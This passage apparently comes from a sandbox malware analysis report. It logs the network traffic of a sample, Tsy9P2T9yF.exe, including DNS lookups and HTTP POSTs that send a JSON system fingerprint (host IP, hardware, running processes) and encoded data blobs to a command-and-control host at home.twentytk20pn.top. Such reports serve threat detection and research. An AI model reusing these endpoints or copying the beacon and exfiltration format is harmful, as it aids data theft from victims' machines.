                                                            Dec 20, 2024 17:30:36.006201029 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006447077 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006457090 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006474018 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006494999 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006506920 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006519079 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006529093 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006540060 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006548882 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006572008 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006581068 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006660938 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006670952 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006719112 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006777048 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006844044 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007098913 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007108927 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007118940 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007280111 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007289886 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007301092 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007334948 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007344961 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007356882 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007385015 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007395029 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007405043 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007409096 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007430077 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007440090 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007451057 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007455111 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007457972 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007467985 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007483959 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007497072 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.007515907 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.008757114 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.008959055 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009073973 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009084940 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009094000 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009104967 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009144068 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009154081 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009164095 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009268045 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009279013 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009318113 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009326935 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009347916 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009357929 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009397984 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009474993 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009561062 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009572029 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009675980 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009686947 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009699106 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.009882927 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010010958 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.010020971 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010031939 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010160923 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010173082 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010181904 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010193110 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010204077 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010226965 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010303974 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010314941 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010327101 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010339022 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010540962 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010550976 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010564089 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010575056 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010585070 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010668039 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010679007 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010942936 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010962009 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010972023 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010982037 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.010993004 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.011003971 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.011015892 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.011070013 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.011081934 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.011182070 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.011195898 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.025253057 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:36.025319099 CET | 80 | 49723 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:37.176873922 CET | 49728 | 80 | 192.168.2.11 | 147.45.113.159
                                                            Dec 20, 2024 17:30:37.296971083 CET | 80 | 49728 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:37.297059059 CET | 49728 | 80 | 192.168.2.11 | 147.45.113.159
                                                            Dec 20, 2024 17:30:37.297437906 CET | 49728 | 80 | 192.168.2.11 | 147.45.113.159
                                                            Dec 20, 2024 17:30:37.417361975 CET | 80 | 49728 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:38.778016090 CET | 80 | 49728 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:38.778281927 CET | 80 | 49728 | 147.45.113.159 | 192.168.2.11
                                                            Dec 20, 2024 17:30:38.778345108 CET | 49728 | 80 | 192.168.2.11 | 147.45.113.159
                                                            Dec 20, 2024 17:30:38.778578043 CET | 49728 | 80 | 192.168.2.11 | 147.45.113.159
                                                            Dec 20, 2024 17:30:38.898164988 CET | 80 | 49728 | 147.45.113.159 | 192.168.2.11
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Dec 20, 2024 17:30:30.409610987 CET | 52524 | 53 | 192.168.2.11 | 1.1.1.1
                                                            Dec 20, 2024 17:30:30.409688950 CET | 52524 | 53 | 192.168.2.11 | 1.1.1.1
                                                            Dec 20, 2024 17:30:30.546689034 CET | 53 | 52524 | 1.1.1.1 | 192.168.2.11
                                                            Dec 20, 2024 17:30:30.701977015 CET | 53 | 52524 | 1.1.1.1 | 192.168.2.11
                                                            Dec 20, 2024 17:30:34.190315962 CET | 52527 | 53 | 192.168.2.11 | 1.1.1.1
                                                            Dec 20, 2024 17:30:34.190751076 CET | 52527 | 53 | 192.168.2.11 | 1.1.1.1
                                                            Dec 20, 2024 17:30:34.327322006 CET | 53 | 52527 | 1.1.1.1 | 192.168.2.11
                                                            Dec 20, 2024 17:30:34.327483892 CET | 53 | 52527 | 1.1.1.1 | 192.168.2.11
                                                            Dec 20, 2024 17:30:37.037614107 CET | 52529 | 53 | 192.168.2.11 | 1.1.1.1
                                                            Dec 20, 2024 17:30:37.037734985 CET | 52529 | 53 | 192.168.2.11 | 1.1.1.1
                                                            Dec 20, 2024 17:30:37.175995111 CET | 53 | 52529 | 1.1.1.1 | 192.168.2.11
                                                            Dec 20, 2024 17:30:37.176065922 CET | 53 | 52529 | 1.1.1.1 | 192.168.2.11
                                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                            Dec 20, 2024 17:30:30.409610987 CET | 192.168.2.11 | 1.1.1.1 | 0x9484 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
                                                            Dec 20, 2024 17:30:30.409688950 CET | 192.168.2.11 | 1.1.1.1 | 0x577b | Standard query (0) | httpbin.org | 28 (AAAA) | IN (0x0001) | false
                                                            Dec 20, 2024 17:30:34.190315962 CET | 192.168.2.11 | 1.1.1.1 | 0x8144 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
                                                            Dec 20, 2024 17:30:34.190751076 CET | 192.168.2.11 | 1.1.1.1 | 0xc7ea | Standard query (0) | home.twentytk20pn.top | 28 (AAAA) | IN (0x0001) | false
                                                            Dec 20, 2024 17:30:37.037614107 CET | 192.168.2.11 | 1.1.1.1 | 0xbdd8 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
                                                            Dec 20, 2024 17:30:37.037734985 CET | 192.168.2.11 | 1.1.1.1 | 0xf185 | Standard query (0) | home.twentytk20pn.top | 28 (AAAA) | IN (0x0001) | false
                                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                            Dec 20, 2024 17:30:24.051780939 CET | 1.1.1.1 | 192.168.2.11 | 0xc7ea | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                                            Dec 20, 2024 17:30:24.051780939 CET | 1.1.1.1 | 192.168.2.11 | 0xc7ea | No error (0) | s-part-0035.t-0009.t-msedge.net | - | 13.107.246.63 | A (IP address) | IN (0x0001) | false
                                                            Dec 20, 2024 17:30:30.701977015 CET | 1.1.1.1 | 192.168.2.11 | 0x9484 | No error (0) | httpbin.org | - | 34.226.108.155 | A (IP address) | IN (0x0001) | false
                                                            Dec 20, 2024 17:30:30.701977015 CET | 1.1.1.1 | 192.168.2.11 | 0x9484 | No error (0) | httpbin.org | - | 98.85.100.80 | A (IP address) | IN (0x0001) | false
                                                            Dec 20, 2024 17:30:34.327322006 CET | 1.1.1.1 | 192.168.2.11 | 0x8144 | No error (0) | home.twentytk20pn.top | - | 147.45.113.159 | A (IP address) | IN (0x0001) | false
                                                            Dec 20, 2024 17:30:37.175995111 CET | 1.1.1.1 | 192.168.2.11 | 0xbdd8 | No error (0) | home.twentytk20pn.top | - | 147.45.113.159 | A (IP address) | IN (0x0001) | false
                                                            • httpbin.org
                                                            • home.twentytk20pn.top
                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.11 | 49723 | 147.45.113.159 | 80 | 7772 | C:\Users\user\Desktop\Tsy9P2T9yF.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 20, 2024 17:30:34.451566935 CET | 12360 | OUT | POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                            Host: home.twentytk20pn.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 577602
                                                            Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 32 32 33 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "1734712231", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 764 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": 856 }, { "name": "svchost.exe", "pid": 916 }, { "name": "dwm.exe", "pid": 980 }, { "name": "svchost.exe", "pid": 352 }, { "name": "svchost.exe", "pid": 476 }, { "name": "svchost.exe", "pid": 660 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                            Dec 20, 2024 17:30:34.571465969 CET | 4944 | OUT | Data Raw: 76 45 48 69 62 77 58 6b 45 71 31 44 47 35 78 54 78 4f 4f 6f 56 4a 30 71 6d 58 35 5a 46 34 5c 2f 46 30 36 39 4a 75 4e 54 44 31 5c 2f 59 58 77 32 44 72 77 73 2b 65 6e 6a 73 52 68 70 52 74 5a 2b 39 4b 4b 66 36 62 77 7a 34 50 2b 49 48 46 56 50 44 34
                                                            Data Ascii: vEHibwXkEq1DG5xTxOOoVJ0qmX5ZF4\/F069JuNTD1\/YXw2Drws+enjsRhpRtZ+9KKf6bwz4P+IHFVPD4rA5DWweXYmnTr0c0ziUcrwVXDVoxlSxWGWJti8fhqqlF062XYXGQmryTcYTcfksf8tPx\/rUdforY\/Br4QeJtFUXPgiXw\/M8jMNR8JeKfEsGoIwI2xlfFuoeM9LktuD5kf9lx3LgkJewna6+X+I\/2R78+ZN4A8
                                                            Dec 20, 2024 17:30:34.571490049 CET | 4944 | OUT | Data Raw: 2b 48 35 55 47 6c 50 72 38 76 31 47 65 59 6e 79 4a 76 32 66 76 66 2b 65 76 37 67 66 36 4c 5c 2f 41 50 71 35 2b 6c 4d 58 39 35 73 64 5c 2f 4c 64 5c 2f 2b 57 51 5c 2f 35 59 65 5c 2f 54 33 5c 2f 50 76 54 79 72 79 66 38 41 4c 62 59 6e 36 51 39 73 66
                                                            Data Ascii: +H5UGlPr8v1GeYnyJv2fvf+ev7gf6L\/APq5+lMX95sd\/Ld\/+WQ\/5Ye\/T3\/PvTyryf8ALbYn6Q9sfj7fT3pmdzbE8zZ5X\/LP\/lsf0\/ye9BvDf5fqiH\/v28n\/AG6\/5\/pg96P9yT78v72Pnz80\/wCTh\/8AUP1l5x6\/54o8t5P9c\/EfHH+enp\/nFey8o\/d\/wDUh3GNZtn3\/AOv+foaZ5ny\/Onz+b5X2eS
                                                            Dec 20, 2024 17:30:34.571744919 CET | 4944 | OUT | Data Raw: 2f 6a 37 34 6b 65 4d 64 4a 66 58 4c 66 77 5c 2f 59 65 4e 72 76 53 6c 38 57 7a 65 42 74 4c 73 74 66 6e 31 4f 31 30 77 61 78 63 36 51 39 72 71 48 68 6e 53 47 51 33 58 67 39 6e 62 37 55 5c 2f 77 43 43 61 48 78 71 30 6e 34 45 5c 2f 77 44 42 4d 62 78
                                                            Data Ascii: /j74keMdJfXLfw\/YeNrvSl8WzeBtLstfn1O10waxc6Q9rqHhnSGQ3Xg9nb7U\/wCCaHxq0n4E\/wDBMbxZ4u1n9qT\/AIZItdR\/bw13w5H8R\/8AhSNz8ev7bnu\/2ffAepr4I\/4Q+10rV5NN\/tKPSJde\/wCElNsiWf8Awjf9lmdW1hY5f4kweZY2GOnQxmJjWhSoylVioYako1UoOUPaSVGN6cm4ScqkYuSe+jf96cH+K
                                                            Dec 20, 2024 17:30:34.571782112 CET | 9888 | OUT | Data Raw: 58 50 4a 7a 5c 2f 72 43 47 5c 2f 6c 2b 6c 56 70 49 5c 2f 76 62 5c 2f 76 38 65 6e 2b 66 72 69 67 31 49 66 52 45 5c 2f 35 5a 5c 2f 77 43 71 5c 2f 77 41 5c 2f 5c 2f 71 39 75 4b 59 41 37 66 64 54 7a 44 39 53 50 31 71 66 61 5c 2f 77 44 75 63 5c 2f 36
                                                            Data Ascii: XPJz\/rCG\/l+lVpI\/vb\/v8en+frig1IfRE\/5Z\/wCq\/wA\/\/q9uKYA7fdTzD9SP1qfa\/wDuc\/6v\/lv09s9ag8t\/k\/jx\/kfp9P1zQdAeWn8aRp\/y17ifpVNl+b\/Y\/wCmn7i3\/wC3Tt1\/+vVzb+7+f85P5\/n\/ACx1FQ7Y\/n\/j8v8Ae9zQdlPr8isWO3Z9f8\/hx\/k0yVv3e9\/+\/n+enOP8Km\/1n8
                                                            Dec 20, 2024 17:30:34.691277981 CET | 2472 | OUT | Data Raw: 66 34 48 78 5c 2f 50 6a 5c 2f 77 43 74 6e 38 76 78 71 48 5c 2f 62 5c 2f 77 43 57 66 5c 2f 31 5c 2f 7a 36 63 66 58 6a 72 51 64 68 44 39 35 66 6e 39 4f 6b 66 50 2b 66 62 38 65 4b 68 62 2b 35 74 2b 6d 66 35 5c 2f 35 50 31 37 31 63 6b 54 35 55 2b 54
                                                            Data Ascii: f4Hx\/Pj\/wCtn8vxqH\/b\/wCWf\/1\/z6cfXjrQdhD95fn9OkfP+fb8eKhb+5t+mf5\/5P171ckT5U+T\/v3n+np9f\/rwxhPnf+P\/AJa\/5\/z+tBVLp\/h\/yIfL\/wCmNRSfnx5v+t61LIf9jZ\/10l\/Xp\/nHSmf3E2x89e3k\/Sg7iGTZ8j\/cfP8Az14\/yO3b8KZ8\/wB9E3\/9O\/4D8z\/TinD7kf8A7U\/4+P
                                                            Dec 20, 2024 17:30:34.691381931 CET | 4944 | OUT | Data Raw: 2b 69 33 64 53 37 6b 2b 35 73 47 50 4e 5c 2f 77 43 58 65 4c 79 50 38 35 71 47 4f 52 38 66 33 45 6a 5c 2f 41 4e 56 2b 2b 75 76 5c 2f 41 41 46 5c 2f 58 4a 6f 2b 50 79 74 38 39 5c 2f 75 37 47 6c 50 72 38 76 31 43 54 39 35 73 33 76 73 38 79 4b 33 38
                                                            Data Ascii: +i3dS7k+5sGPN\/wCXeLyP85qGOR8f3Ej\/ANV++uv\/AAF\/XJo+Pyt89\/u7GlPr8v1CT95s3vs8yK3839z+n+Pfj8aGkdMJ\/H\/qhJ5vn\/56fhT5P9Ynk\/8APK3l+0ebj9f\/AK9QybPmd08n975X7z\/Pf654rM0GbvL3uEG\/zR+7\/wCe30\/l\/nk2vJ86eZv5k\/1p\/fe9paCnrlWREfe\/+t8ySX\/POM1EW5+
                                                            Dec 20, 2024 17:30:34.691421986 CET | 7416 | OUT | Data Raw: 2f 77 44 46 42 58 35 63 5c 2f 74 73 5c 2f 74 59 48 39 73 58 34 71 36 42 38 54 6a 34 46 48 77 34 62 51 5c 2f 68 5c 2f 70 58 67 51 61 45 50 45 5c 2f 5c 2f 43 58 43 35 54 53 5c 2f 45 58 69 6e 78 41 4e 56 4f 71 5c 2f 38 49 39 34 5a 4d 62 58 44 2b 4b
                                                            Data Ascii: /wDFBX5c\/ts\/tYH9sX4q6B8Tj4FHw4bQ\/h\/pXgQaEPE\/\/CXC5TS\/EXinxANVOq\/8I94ZMbXD+KJLQ2P9muIVsUn+2TG5MNv8peJfD2ueHPEfhnwnBP4W8XeIvEnxsuP2b59J8Ga9fX954N+PFpoXg\/xDd\/C\/x8Nb8P8Ah238P+ILWx8YxrLdWtxq\/h95vDfjMW2tTx+FtUlhq6bb+F9e8JeGPEugfGv4D6\/rHx
                                                            Dec 20, 2024 17:30:34.736499071 CET | 27192 | OUT | Data Raw: 59 7a 63 6b 61 75 6e 33 33 38 72 39 31 48 48 2b 76 38 41 53 71 32 32 52 46 33 37 50 6e 5c 2f 36 5a 5c 2f 75 50 38 39 75 35 78 55 30 6d 79 52 76 4a 5c 2f 6a 4d 58 2b 66 38 41 4a 36 55 4d 79 66 75 58 32 52 70 35 63 58 37 33 5c 2f 6a 36 39 5c 2f 77
                                                            Data Ascii: Yzckaun338r91HH+v8ASq22RF37Pn\/6Z\/uP89u5xU0myRvJ\/jMX+f8AJ6UMyfuX2Rp5cX73\/j69\/wDP\/wCqg1CSP5XeOH5P9b5cn+v+z\/8ALoM\/mPyqF\/l2bP8Alp+6l68\/9PX19P8ACj5Cv3NkPleVFJHL\/qf9L5\/zn1qb98EhT773Hf8A569\/8\/40AMjk2tHsTzX\/AOefXr\/n65qFd8cbu\/z9PN\/ddP
                                                            Dec 20, 2024 17:30:34.856455088 CET | 7416 | OUT | Data Raw: 43 66 70 2b 46 4a 75 32 79 59 66 72 5c 2f 71 76 33 6b 58 42 5c 2f 6c 5c 2f 6e 76 69 6f 6c 58 7a 50 6e 2b 34 4f 5c 2f 6d 66 54 4e 41 42 6e 62 76 54 37 37 78 5c 2f 38 39 50 33 5c 2f 41 50 31 39 34 39 66 70 33 70 6d 50 34 48 65 56 45 38 30 53 79 5c
                                                            Data Ascii: Cfp+FJu2yYfr\/qv3kXB\/l\/nviolXzPn+4O\/mfTNABnbvT77x\/89P3\/AP1949fp3pmP4HeVE80Sy\/vf3\/r+fSnyb93nbMJzL3\/T6f5FNmjhaHf\/AMtvNzF3\/wCPzH1rnOyn1+X6lVo32\/fiSGOLzfN8r+f+fT8G\/Pt\/8i\/vf\/rdP89ealEblkR\/uf6r8v8AOf6VFIXVk85P+mXmc\/55\/wAitqXT\/F\/k
                                                            Dec 20, 2024 17:30:35.022742033 CET | 1236 | OUT | Data Raw: 47 51 63 66 63 59 35 4a 6c 57 46 64 53 72 57 65 47 79 33 4b 75 49 63 78 77 4f 42 6f 4f 74 57 6e 55 72 56 58 52 77 74 43 6c 54 39 70 56 71 54 71 31 4f 58 6d 71 54 6c 4e 74 75 76 52 56 69 6f 6d 58 48 49 36 66 79 72 37 51 2b 48 39 72 35 79 5c 2f 72
                                                            Data Ascii: GQcfcY5JlWFdSrWeGy3KuIcxwOBoOtWnUrVXRwtClT9pVqTq1OXmqTlNtuvRViomXHI6fyr7Q+H9r5y\/r5kOwe\/8An8KbtH94f5\/GpaZsHv8A5\/Cgoiop0i5\/H+n+RUfz\/wCz+tB0ENFSeX7\/AKf\/AF6jrT2fn+H\/AAQCo\/L9\/wBP\/r1JTH6fj\/jT5F5\/18jXnXn\/AF8yKiiirLIn6\/h\/U0ypZOifQ\/zq
                                                            Dec 20, 2024 17:30:35.905395031 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.11 | 49728 | 147.45.113.159 | 80 | 7772 | C:\Users\user\Desktop\Tsy9P2T9yF.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 20, 2024 17:30:37.297437906 CET | 287 | OUT | POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                            Host: home.twentytk20pn.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 143
                                                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                            Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                            Dec 20, 2024 17:30:38.778016090 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


